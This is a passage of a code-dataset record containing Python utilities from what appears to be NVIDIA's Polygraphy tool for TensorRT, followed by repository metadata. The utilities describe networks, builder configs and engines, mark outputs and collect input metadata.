\"IPluginV2Layer\")\n try_add(\"SLICE\", \"ISliceLayer\")\n try_add(\"SHAPE\", \"IShapeLayer\")\n try_add(\"PARAMETRIC_RELU\", \"IParametricReLULayer\")\n try_add(\"RESIZE\", \"IResizeLayer\")\n try_add(\"TRIP_LIMIT\", \"ITripLimitLayer\")\n try_add(\"RECURRENCE\", \"IRecurrenceLayer\")\n try_add(\"ITERATOR\", \"IIteratorLayer\")\n try_add(\"LOOP_OUTPUT\", \"ILoopOutputLayer\")\n try_add(\"SELECT\", \"ISelectLayer\")\n try_add(\"FILL\", \"IFillLayer\")\n try_add(\"QUANTIZE\", \"IQuantizeLayer\")\n try_add(\"DEQUANTIZE\", \"IDequantizeLayer\")\n try_add(\"CONDITION\", \"IConditionLayer\")\n try_add(\"CONDITIONAL_INPUT\", \"IIfConditionalInputLayer\")\n try_add(\"CONDITIONAL_OUTPUT\", \"IIfConditionalOutputLayer\")\n try_add(\"ASSERTION\", \"IAssertionLayer\")\n try_add(\"SCATTER\", \"IScatterLayer\")\n try_add(\"EINSUM\", \"IEinsumLayer\")\n try_add(\"GRID_SAMPLE\", \"IGridSampleLayer\")\n try_add(\"ONE_HOT\", \"IOneHotLayer\")\n try_add(\"NON_ZERO\", \"INonZeroLayer\")\n try_add(\"NMS\", \"INMSLayer\")\n try_add(\"REVERSE_SEQUENCE\", \"IReverseSequenceLayer\")\n try_add(\"NORMALIZATION\", \"INormalizationLayer\")\n try_add(\"CAST\", \"ICastLayer\")\n\n return layer_class_mapping\n\ndef check_numpy_trt_compatibility():\n if mod.version(trt.__version__) < mod.version(\"8.6\") and \\\n mod.version(np.__version__) >= mod.version(\"1.24\"):\n # TensorRT < 8.6 uses a deprecated alias np.bool that was removed in NumPy >= 1.24\n G_LOGGER.warning(f\"TensorRT version {trt.__version__} and NumPy version {np.__version__} \"\n \"are not compatible. 
Consider downgrading your NumPy package to a version < 1.24 \"\n \"or upgrading TensorRT to a version >= 8.6.\", mode=LogMode.ONCE)\n\n\ndef np_dtype_from_trt(trt_dtype):\n # trt.nptype uses NumPy, so to make autoinstall work, we need to trigger it before that.\n mod.autoinstall(np)\n check_numpy_trt_compatibility()\n return np.dtype(trt.nptype(trt_dtype))\n\n\ndef get_network_input_names_meta(network):\n names = []\n meta = TensorMetadata()\n for i in range(network.num_inputs):\n tensor = network.get_input(i)\n names.append(tensor.name)\n meta.add(name=tensor.name, dtype=np_dtype_from_trt(tensor.dtype), shape=tensor.shape)\n return names, meta\n\n\ndef get_network_output_names_meta(network):\n names = []\n meta = TensorMetadata()\n for i in range(network.num_outputs):\n tensor = network.get_output(i)\n names.append(tensor.name)\n meta.add(name=tensor.name, dtype=np_dtype_from_trt(tensor.dtype), shape=tensor.shape)\n return names, meta\n\n\ndef get_layer_input_names_meta(layer):\n names = []\n meta = TensorMetadata()\n for i in range(layer.num_inputs):\n inp = layer.get_input(i)\n if inp:\n names.append(inp.name)\n meta.add(inp.name, np_dtype_from_trt(inp.dtype), inp.shape)\n return names, meta\n\n\ndef get_layer_output_names_meta(layer):\n names = []\n meta = TensorMetadata()\n for i in range(layer.num_outputs):\n out = layer.get_output(i)\n if out:\n names.append(out.name)\n meta.add(out.name, np_dtype_from_trt(out.dtype), out.shape)\n return names, meta\n\n\ndef str_from_layer(layer, index):\n input_names, input_meta = get_layer_input_names_meta(layer)\n output_names, output_meta = get_layer_output_names_meta(layer)\n return util.str_from_layer(\n \"Layer\", index, layer.name, layer.type, input_names, input_meta, output_names, output_meta\n )\n\n\ndef get_layer_attribute_names(layer):\n def is_special_attribute(attr):\n return attr.startswith(\"__\") and attr.endswith(\"__\")\n\n def is_valid_attribute(attr, layer):\n if (\n type(layer) == trt.IPoolingLayer\n or type(layer) == trt.IConvolutionLayer\n or type(layer) == trt.IDeconvolutionLayer\n ):\n if len(layer.get_input(0).shape) > 4:\n # 3D pooling uses padding_nd\n return attr not in [\"padding\", \"stride\", \"window_size\"]\n if type(layer) == trt.IResizeLayer:\n if layer.num_inputs > 1:\n return attr not in [\"scales\"]\n if type(layer) == trt.ISliceLayer:\n if layer.num_inputs > 1:\n return attr not in [\"shape\", \"start\", \"stride\"]\n return True\n\n return [\n attr\n for attr in dir(layer)\n if not is_special_attribute(attr) and not hasattr(trt.ILayer, attr) and is_valid_attribute(attr, layer)\n ]\n\n\ndef str_from_network(network, show_layers=None, show_attrs=None, show_weights=None):\n \"\"\"\n Converts a TensorRT network to a human-readable representation\n\n Args:\n network (trt.INetworkDefinition): The network.\n show_layers (bool): Whether to display per-layer information.\n show_attrs (bool): Whether to display per-layer attributes.\n show_weights (bool): Whether to display the value of weights.\n\n Returns:\n str\n \"\"\"\n show_layers = util.default(show_layers, False)\n show_attrs = util.default(show_attrs, False)\n show_weights = util.default(show_weights, False)\n\n LAYER_TYPE_CLASS_MAPPING = get_layer_class_mapping()\n\n network_str = f\"Name: {network.name} | {'Implicit' if hasattr(network, 'has_implicit_batch_dimension') and network.has_implicit_batch_dimension else 'Explicit'} Batch Network{' with Explicit Precision ' if hasattr(network, 'has_explicit_precision') and network.has_explicit_precision else 
''}\\n\"\n network_str += \"\\n\"\n\n _, input_metadata = get_network_input_names_meta(network)\n network_str += f\"---- {len(input_metadata)} Network Input(s) ----\\n{input_metadata}\\n\\n\"\n _, output_metadata = get_network_output_names_meta(network)\n network_str += f\"---- {len(output_metadata)} Network Output(s) ----\\n{output_metadata}\\n\\n\"\n network_str += f\"---- {network.num_layers} Layer(s) ----\\n\"\n if show_layers:\n for index, layer in enumerate(network):\n if layer.type in LAYER_TYPE_CLASS_MAPPING:\n layer.__class__ = LAYER_TYPE_CLASS_MAPPING[layer.type]\n\n network_str += str_from_layer(layer, index)\n\n if show_attrs:\n # Exclude special attributes, as well as any attributes of the base layer class (those can be displayed above).\n attrs = get_layer_attribute_names(layer)\n if attrs:\n network_str += util.indent_block(\"---- Attributes ----\") + \"\\n\"\n for attr in attrs:\n with G_LOGGER.verbosity():\n val = getattr(layer, attr)\n if show_weights or not isinstance(val, np.ndarray):\n attr_str = \"\"\n if layer.name:\n attr_str += f\"{layer.name}.\"\n network_str += util.indent_block(f\"{attr_str}{attr} = {val}\") + \"\\n\"\n network_str += \"\\n\"\n\n return util.indent_block(network_str, level=0)\n\n\ndef get_all_tensors(network):\n all_tensors = set()\n for layer in network:\n for i in range(layer.num_inputs):\n all_tensors.add(layer.get_input(i))\n for i in range(layer.num_outputs):\n all_tensors.add(layer.get_output(i))\n # Optional tensors that are omitted are reported as `None`s, so we need to exclude them.\n return {t.name: t for t in all_tensors if t is not None}\n\n\ndef mark_outputs(network, outputs):\n \"\"\"\n Mark the specified outputs as network outputs.\n\n Args:\n network (trt.INetworkDefinition): The network in which to mark outputs.\n outputs (Sequence[str]): The names of tensors to mark as outputs.\n \"\"\"\n outputs = util.unique_list(outputs)\n\n tensor_map = get_all_tensors(network)\n util.check_sequence_contains(\n tensor_map.keys(), outputs, name=\"the network\", items_name=\"outputs\", check_extra=False\n )\n\n for tensor in tensor_map.values():\n # Clear all old outputs\n if tensor.is_network_output:\n network.unmark_output(tensor)\n\n for name in outputs:\n G_LOGGER.ultra_verbose(f\"Marking {name} as an output\")\n network.mark_output(tensor_map[name])\n\n\ndef mark_layerwise(network):\n # Layers within loops cannot be marked as network outputs.\n LOOP_START_NAMES = [\"TRIP_LIMIT\", \"ITERATOR\", \"RECURRENCE\"]\n LOOP_END_NAMES = [\"LOOP_OUTPUT\"]\n LOOP_START_LAYERS = [getattr(trt.LayerType, attr) for attr in LOOP_START_NAMES if hasattr(trt.LayerType, attr)]\n LOOP_END_LAYERS = [getattr(trt.LayerType, attr) for attr in LOOP_END_NAMES if hasattr(trt.LayerType, attr)]\n EXCLUDE_LAYERS = [trt.LayerType.SHAPE, trt.LayerType.CONSTANT]\n outputs = []\n in_loop = False\n for layer in network:\n if layer.type in LOOP_START_LAYERS:\n G_LOGGER.warning(\n \"Loop detected. 
Please ensure the network is topologically sorted so that layers within \"\n \"the loop body are not marked as network outputs in layerwise mode\",\n mode=LogMode.ONCE,\n )\n in_loop = True\n elif layer.type in LOOP_END_LAYERS:\n in_loop = False\n\n should_mark_layer = not in_loop and layer.type not in EXCLUDE_LAYERS\n if should_mark_layer:\n for index in range(layer.num_outputs):\n tensor = layer.get_output(index)\n if tensor is not None:\n outputs.append(tensor.name)\n\n G_LOGGER.verbose(f\"Marking {len(outputs)} tensors as outputs\")\n mark_outputs(network, outputs)\n\n\ndef unmark_outputs(network, outputs):\n outputs = util.unique_list(outputs)\n\n tensor_map = get_all_tensors(network)\n util.check_sequence_contains(\n tensor_map.keys(), outputs, name=\"the network\", items_name=\"outputs\", check_extra=False\n )\n\n for name in outputs:\n tensor = tensor_map[name]\n if tensor.is_network_output:\n network.unmark_output(tensor)\n\n\ndef str_from_config(config):\n # Check the default device type so that we can trigger this from the tests.\n # On non-DLA platforms, config.DLA_core can never be set to anything other than -1,\n # but default_device_type can be set to DLA..\n using_dla = config.DLA_core >= 0 or config.default_device_type == trt.DeviceType.DLA\n\n lines = []\n\n def str_from_list(lst):\n return \"[\" + \", \".join(lst) + \"]\"\n\n def add_line(title, line):\n lines.append((f\"{title:{22}} | \" + line).strip())\n\n def get_enabled_enum_vals(EnumType, is_enabled):\n # is_enabled is a Callable[[enum_val], bool] which reports whether to include the enum value.\n return [name for name, enum_val in EnumType.__members__.items() if is_enabled(enum_val)]\n\n # Flags\n enabled_builder_flags = get_enabled_enum_vals(trt.BuilderFlag, lambda flag: config.get_flag(flag))\n add_line(\"Flags\", f\"{str_from_list(enabled_builder_flags)}\")\n\n # Engine Capability\n with contextlib.suppress(AttributeError):\n add_line(\"Engine Capability\", str(config.engine_capability))\n\n # Memory Pools\n with contextlib.suppress(AttributeError):\n mem_pool_limits = [\n f\"{name}: {config.get_memory_pool_limit(pool_type) / float(1<<20):.2f} MiB\"\n for name, pool_type in trt.MemoryPoolType.__members__.items()\n # Only show DLA memory pools when DLA is in use\n if (not name.startswith(\"DLA\") or using_dla)\n ]\n add_line(\"Memory Pools\", f\"{str_from_list(mem_pool_limits)}\")\n\n # Tactic Sources\n with contextlib.suppress(AttributeError):\n source_vals = get_enabled_enum_vals(trt.TacticSource, lambda val: (1 << int(val)) & config.get_tactic_sources())\n add_line(\"Tactic Sources\", f\"{str_from_list(source_vals)}\")\n\n # DLA\n if using_dla:\n add_line(\"DLA\", f\"Default Device Type: {config.default_device_type}, Core: {config.DLA_core}\")\n\n # Profiling Verbosity\n with contextlib.suppress(AttributeError):\n add_line(\"Profiling Verbosity\", f\"{config.profiling_verbosity}\")\n\n # Optimization Profiles\n if config.num_optimization_profiles > 1: # Not particularly interesting unless there are multiple.\n add_line(\"Optimization Profiles\", f\"{config.num_optimization_profiles} profile(s)\")\n\n # Preview Features\n with contextlib.suppress(AttributeError):\n feature_vals = get_enabled_enum_vals(trt.PreviewFeature, lambda val: config.get_preview_feature(val))\n if feature_vals:\n add_line(\"Preview Features\", f\"{str_from_list(feature_vals)}\")\n\n # Calibrator\n if config.int8_calibrator:\n add_line(\"Calibrator\", f\"{config.int8_calibrator}\")\n\n return \"\\n\".join(lines)\n\n\ndef 
check_profile(profile):\n if not bool(profile):\n G_LOGGER.critical(f\"Profile is not valid, please provide profile data.\\nNote: profile was: {profile}\")\n return profile\n\n\ndef str_from_tensor(tensor, is_shape_tensor):\n ret = \"Input \"\n if is_shape_tensor:\n ret += \"shape-tensor\"\n else:\n ret += \"tensor\"\n ret += f\": {tensor.name} (dtype={tensor.dtype}, shape={tensor.shape})\"\n return ret\n\n\n# Note: When `force_opt_shapes=True` this method is treated as being specific to calibration.\ndef get_input_metadata_from_network(network, profile, force_opt_shapes=None):\n \"\"\"\n Returns metadata about the inputs of a network, referring to the values\n set in a profile for dynamic shapes.\n\n Args:\n network (trt.INetworkDefinition):\n The network the profile applies to.\n profile (trt.IOptimizationProfile):\n The profile from which to retrieve input metadata.\n\n force_opt_shapes (bool):\n Whether to ignore the minimum and maximum shapes in the profile\n and always use OPT shapes.\n Defaults to False.\n\n Returns:\n TensorMetadata:\n A mapping of input names to their types and shapes.\n Shapes are retrieved from the OPT values in the profile.\n\n Raises:\n PolygraphyException:\n If the network has dynamic shapes or shape tensor inputs but no profile\n was provided.\n \"\"\"\n force_opt_shapes = util.default(force_opt_shapes, False)\n\n input_metadata = TensorMetadata()\n for index in range(network.num_inputs):\n tensor = network.get_input(index)\n # Only access the profile if we actually need to.\n # This way, this method works with static networks even without a profile set.\n min_shape = None\n max_shape = None\n opt_shape = tensor.shape\n if tensor.is_shape_tensor or util.is_shape_dynamic(tensor.shape):\n if tensor.is_shape_tensor:\n min_shape, opt_shape, max_shape = profile.get_shape_input(tensor.name)\n else:\n min_shape, opt_shape, max_shape = profile.get_shape(tensor.name)\n\n if force_opt_shapes and tuple(min_shape) != tuple(max_shape):\n G_LOGGER.warning(\n \"TensorRT does not currently support using dynamic shapes during calibration. \"\n \"The `OPT` shapes from the calibration profile will be used for tensors with dynamic shapes. \"\n \"Calibration data is expected to conform to those shapes. 
\",\n mode=LogMode.ONCE,\n )\n\n input_metadata.add(\n name=tensor.name,\n dtype=np_dtype_from_trt(tensor.dtype),\n shape=opt_shape if force_opt_shapes else tensor.shape,\n min_shape=None if force_opt_shapes else min_shape,\n max_shape=None if force_opt_shapes else max_shape,\n )\n return input_metadata\n\n\n# calib_profile parameter is used to bypass `get_calibration_profile()` to make this work on TRT 7.0 and older.\ndef try_setup_polygraphy_calibrator(config, network, calib_profile=None):\n \"\"\"\n Tries to call setup methods specific to Polygraphy calibrators.\n Returns early if there is no calibrator or if it is not a Polygraphy calibrator.\n \"\"\"\n calibrator = config.int8_calibrator\n if calibrator is None or not (\n hasattr(calibrator, \"is_polygraphy_calibrator\") and calibrator.is_polygraphy_calibrator\n ):\n # No calibrator or not a Polygraphy calibrator.\n return\n\n if calib_profile is None:\n try:\n calib_profile = config.get_calibration_profile()\n except AttributeError:\n G_LOGGER.extra_verbose(\"Cannot get calibration profile on TensorRT 7.0 and older.\")\n # Return early so we don't emit extraneous warnings on TRT 7.0 and older.\n return\n\n try:\n # TensorRT does not currently support shapes other than the OPT shape.\n input_metadata = get_input_metadata_from_network(network, calib_profile, force_opt_shapes=True)\n except PolygraphyException as err:\n G_LOGGER.warning(\n \"Could not determine input_metadata to provide to the calibrator because no calibration profile is set. \"\n \"Please either set a calibration profile in the config or call `calibrator.set_input_metadata()` manually. \"\n f\"\\nNote: Error was:\\n{err}\",\n mode=LogMode.ONCE,\n )\n else:\n calibrator.set_input_metadata(input_metadata)\n\n\ndef get_hwc_shape_from_chw(shape, strides):\n # The relative size (descending sorted order) of the strides should give the permutation to convert the shape\n perm = sorted(range(len(strides)), key=strides.__getitem__, reverse=True)\n return tuple([shape[i] for i in perm])\n\n\ndef get_chw_shape_from_hwc(shape, strides):\n perm = sorted(range(len(strides)), key=strides.__getitem__, reverse=True)\n inv_perm = sorted(range(len(perm)), key=perm.__getitem__)\n return tuple([shape[i] for i in inv_perm])\n\n\ndef get_metadata_from_engine(engine, context, mode):\n meta = TensorMetadata()\n for idx in range(engine.num_io_tensors):\n name = engine.get_tensor_name(idx)\n if engine.get_tensor_mode(name) != mode:\n continue\n\n shape = engine.get_tensor_shape(name)\n # If the input format is HWC, make sure the input is shaped accordingly\n if engine.get_tensor_format(name) == trt.TensorFormat.HWC:\n shape = get_hwc_shape_from_chw(shape, context.get_tensor_strides(name))\n\n meta.add(name=name, dtype=np_dtype_from_trt(engine.get_tensor_dtype(name)), shape=shape)\n return meta\n\n\ndef str_from_engine(engine, context, show_layers=None, show_attrs=None):\n show_layers = util.default(show_layers, False)\n show_attrs = util.default(show_attrs, False)\n\n if _should_use_v3_api():\n num_io_tensors = engine.num_io_tensors\n else:\n num_io_tensors = get_bindings_per_profile(engine)\n\n engine_str = f\"Name: {engine.name} | {'Refittable ' if engine.refittable else ''}{'Implicit' if hasattr(engine, 'has_implicit_batch_dimension') and engine.has_implicit_batch_dimension else 'Explicit'} Batch Engine\\n\"\n engine_str += \"\\n\"\n\n # Show metadata for the first profile (i.e. 
the dynamic shapes)\n if _should_use_v3_api():\n input_metadata = get_metadata_from_engine(engine, context, mode=trt.TensorIOMode.INPUT)\n output_metadata = get_metadata_from_engine(engine, context, mode=trt.TensorIOMode.OUTPUT)\n else:\n input_metadata = get_input_metadata_from_engine(engine, 0, num_io_tensors)\n output_metadata = get_output_metadata_from_engine(engine, 0, num_io_tensors)\n\n engine_str += f\"---- {len(input_metadata)} Engine Input(s) ----\\n{input_metadata}\\n\\n\"\n engine_str += f\"---- {len(output_metadata)} Engine Output(s) ----\\n{output_metadata}\\n\\n\"\n\n engine_str += f\"---- Memory ----\\nDevice Memory: {engine.device_memory_size} bytes\\n\\n\"\n\n engine_str += f\"---- {engine.num_optimization_profiles} Profile(s) ({num_io_tensors} Tensor(s) Each) ----\\n\"\n for profile_index in range(engine.num_optimization_profiles):\n engine_str += f\"- Profile: {profile_index}\\n\"\n\n if _should_use_v3_api():\n max_width = max([len(engine.get_tensor_name(idx)) for idx in range(engine.num_io_tensors)]) + 8\n else:\n max_width = max([len(binding) for binding in engine]) + 8\n\n for idx in range(num_io_tensors):\n if _should_use_v3_api():\n name = engine.get_tensor_name(idx)\n binding_type = \" (Input)\" if engine.get_tensor_mode(name) == trt.TensorIOMode.INPUT else \"(Output)\"\n engine_str += util.indent_block(f\"Tensor: {name:<{max_width}} {binding_type}, Index: {idx}\")\n\n if engine.get_tensor_mode(name) == trt.TensorIOMode.INPUT:\n min_shape, opt_shape, max_shape = engine.get_tensor_profile_shape(name, profile_index)\n engine_str += f\" | Shapes: min={min_shape}, opt={opt_shape}, max={max_shape}\\n\"\n else:\n engine_str += f\" | Shape: {engine.get_tensor_shape(name)}\\n\"\n else:\n binding = profile_index * num_io_tensors + idx\n name = f\"[Name: {engine.get_binding_name(binding)}]\"\n binding_type = \"(Input) \" if engine.binding_is_input(binding) else \"(Output)\"\n engine_str += util.indent_block(f\"Binding Index: {binding} {binding_type} {name:<{max_width}}\")\n\n if engine.binding_is_input(binding):\n if engine.is_shape_binding(binding):\n min_shape, opt_shape, max_shape = engine.get_profile_shape_input(profile_index, binding)\n else:\n min_shape, opt_shape, max_shape = engine.get_profile_shape(profile_index, binding)\n engine_str += f\" | Shapes: min={min_shape}, opt={opt_shape}, max={max_shape}\\n\"\n else:\n engine_str += f\" | Shape: {engine.get_binding_shape(binding)}\\n\"\n engine_str += \"\\n\"\n\n layers_per_profile = engine.num_layers // engine.num_optimization_profiles\n engine_str += (\n f\"---- {layers_per_profile} Layer(s){' Per Profile' if engine.num_optimization_profiles > 1 else ''} ----\\n\"\n )\n if show_layers:\n try:\n inspector = engine.create_engine_inspector()\n except AttributeError:\n G_LOGGER.warning(\n f\"Cannot show layer information because IEngineInspector is not available in this version of TensorRT ({trt.__version__})\"\n )\n else:\n for profile_idx in range(engine.num_optimization_profiles):\n indent_level = 0\n if engine.num_optimization_profiles >= 1:\n indent_level = 1\n engine_str += f\"- Profile: {profile_idx}\\n\"\n\n offset = profile_idx * layers_per_profile\n for index in range(layers_per_profile):\n layer_info = json.loads(\n inspector.get_layer_information(offset + index, trt.LayerInformationFormat.JSON)\n )\n\n op = \"Unknown\"\n input_names, input_meta = [], TensorMetadata()\n output_names, output_meta = [], TensorMetadata()\n origin = \"Unknown\"\n tactic = \"Unknown\"\n if engine.profiling_verbosity == 
trt.ProfilingVerbosity.DETAILED:\n                        name = layer_info.get(\"Name\", \"Unknown\")\n                        op = layer_info.get(\"LayerType\", \"Unknown\")\n\n                        def names_meta_from_inspector(key):\n                            names = []\n                            meta = TensorMetadata()\n                            info = layer_info.get(key)\n                            if info is None:\n                                return names, meta\n                            for elem in info:\n                                names.append(elem[\"Name\"])\n                                meta.add(name=elem[\"Name\"], dtype=None, shape=elem[\"Dimensions\"])\n                            return names, meta\n\n                        input_names, input_meta = names_meta_from_inspector(\"Inputs\")\n                        output_names, output_meta = names_meta_from_inspector(\"Outputs\")\n                        origin = layer_info.get(\"Origin\", \"Unknown\")\n                        tactic = layer_info.get(\"TacticValue\", \"Unknown\")\n                    else:\n                        G_LOGGER.warning(\n                            f\"This engine was created with a profiling verbosity of: {engine.profiling_verbosity}. Some layer information may be missing. Try setting a higher profiling verbosity to see more detailed layer information.\",\n                            mode=LogMode.ONCE,\n                        )\n                        name = layer_info\n\n                    engine_str += (\n                        util.indent_block(\n                            util.str_from_layer(\n                                \"Layer\", index, name, op, input_names, input_meta, output_names, output_meta\n                            ),\n                            indent_level,\n                        )\n                        + \"\\n\"\n                    )\n\n                    if show_attrs:\n                        engine_str += util.indent_block(\"---- Attributes ----\", indent_level + 1) + \"\\n\"\n                        engine_str += util.indent_block(f\"Origin = {origin}\", indent_level + 1) + \"\\n\"\n                        engine_str += util.indent_block(f\"Tactic = {tactic}\", indent_level + 1) + \"\\n\"\n\n                    engine_str += \"\\n\"\n\n    return util.indent_block(engine_str, level=0)\n\n\n# V2 APIs\ndef add_binding_to_metadata(engine, binding, metadata, name_binding):\n    if _should_use_v3_api():\n        G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n    # name_binding always comes from profile 0, since that's where we\n    # get all binding names in the runner\n    metadata.add(\n        name=engine[name_binding],\n        dtype=np_dtype_from_trt(engine.get_binding_dtype(binding)),\n        shape=list(engine.get_binding_shape(binding)),\n    )\n\n\ndef get_input_metadata_from_engine(engine, start_binding, end_binding):\n    if _should_use_v3_api():\n        G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n    inputs = TensorMetadata()\n    for index, binding in enumerate(range(start_binding, end_binding)):\n        if engine.binding_is_input(binding):\n            add_binding_to_metadata(engine, binding, inputs, name_binding=index)\n    return inputs\n\n\ndef get_output_metadata_from_engine(engine, start_binding, end_binding):\n    if _should_use_v3_api():\n        G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n    outputs = TensorMetadata()\n    for index, binding in enumerate(range(start_binding, end_binding)):\n        if not engine.binding_is_input(binding):\n            add_binding_to_metadata(engine, binding, outputs, name_binding=index)\n    return outputs\n\n\ndef get_bindings_per_profile(engine):\n    if _should_use_v3_api():\n        G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n    return engine.num_bindings // engine.num_optimization_profiles\n\n\ndef get_active_profile_bindings(context):\n    \"\"\"\n    Gets the start and end binding indices for the active optimization profile.\n\n    Args:\n        context (trt.IExecutionContext): The context where the profile is currently set.\n            The engine is accessible as ``context.engine``.\n\n    Returns:\n        Tuple[int, int]: The start and end binding indices, in that order\n    \"\"\"\n    if _should_use_v3_api():\n        G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n    active_profile = 
context.active_optimization_profile\n if active_profile < 0:\n G_LOGGER.critical(\n f\"Cannot determine profile bindings since the optimization profile for this context is set to: {active_profile}\"\n )\n\n bindings_per_profile = get_bindings_per_profile(context.engine)\n\n start_binding = bindings_per_profile * active_profile\n end_binding = start_binding + bindings_per_profile\n\n G_LOGGER.ultra_verbose(\n f\"Total # of Profiles: {context.engine.num_optimization_profiles}, Bindings Per Profile: {bindings_per_profile}, \"\n f\"Active Profile: {active_profile}, Start Binding: {start_binding}, End Binding: {end_binding}\"\n )\n return start_binding, end_binding\n", "repo_name": "NVIDIA/TensorRT", "sub_path": "tools/Polygraphy/polygraphy/backend/trt/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 32219, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8187, "dataset": "github-code", "pt": "53", "api": [{"api_name": "polygraphy.mod.lazy_import", "line_number": 11, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 11, "usage_type": "name"}, {"api_name": "polygraphy.mod.lazy_import", "line_number": 12, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 12, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 29, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 29, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 39, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 39, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 40, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 40, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 42, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 42, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 42, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbose", "line_number": 43, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 43, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.extra_verbose", "line_number": 44, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 44, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.super_verbose", "line_number": 45, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 45, "usage_type": "name"}, {"api_name": "os.kill", "line_number": 51, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 51, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 51, "usage_type": "attribute"}, {"api_name": "polygraphy.mod.export", "line_number": 18, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 18, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 61, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 61, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.backtrace", "line_number": 65, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 65, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 66, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", 
"line_number": 66, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 72, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 72, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 73, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 73, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 76, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 76, "usage_type": "name"}, {"api_name": "polygraphy.config.INTERNAL_CORRECTNESS_CHECKS", "line_number": 87, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 87, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 88, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 88, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 145, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 145, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 146, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 146, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 148, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 148, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 150, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 150, "usage_type": "name"}, {"api_name": "polygraphy.mod.autoinstall", "line_number": 155, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 155, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 162, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 172, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 182, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 193, "usage_type": "call"}, {"api_name": "polygraphy.util.str_from_layer", "line_number": 205, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 205, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 251, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 251, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 252, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 252, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 253, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 253, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 276, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 276, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbosity", "line_number": 278, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 278, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 284, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 284, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 287, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 287, "usage_type": "name"}, {"api_name": "polygraphy.util.unique_list", "line_number": 309, "usage_type": "call"}, {"api_name": 
